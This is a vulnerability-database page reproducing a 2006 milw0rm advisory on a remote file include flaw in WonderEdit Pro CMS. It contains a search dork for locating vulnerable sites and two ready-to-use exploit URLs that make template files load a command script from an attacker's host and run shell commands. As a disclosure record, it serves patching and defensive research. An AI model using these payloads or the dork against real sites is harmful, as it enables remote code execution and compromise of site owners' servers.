WonderEdit Pro CMS - exploit.company

vendor:

WonderEdit Pro CMS

by:

OLiBekaS

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: WonderEdit Pro CMS

Affected Version From: Pro version

Affected Version To: Pro version

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

WonderEdit Pro CMS <= Pro version Remote File Include Vulnerabilities

A vulnerability exists in WonderEdit Pro CMS Pro version, which allows attackers to include remote files. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious code to the vulnerable application. This can result in arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of WonderEdit Pro CMS Pro version.

Source

Exploit-DB raw data:

--------------------------------------------------------------------------------

Title : WonderEdit Pro CMS <= Pro version Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Web Site CMS
version : pro version
Description: this default cms for all hosting in Wonder hosting (http://www.12wonderhosting.com/) maybe :)
URL : http://www.wonderedit.com

-----------------------------------------------------------------------------


dork        : "powered by WonderEdit Pro"

Exploit     :  

http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls              
               

------------------------------------------------------------------------------

this work for all template in WonderEdit Pro CMS and use "rwb" for or "gbw" default attack, and vulner to other tempalte to like
"blues", "bluwhi", "grns", and other.

------------------------------------------------------------------------------


greatz:
~~~~~

# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------


Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-07-04]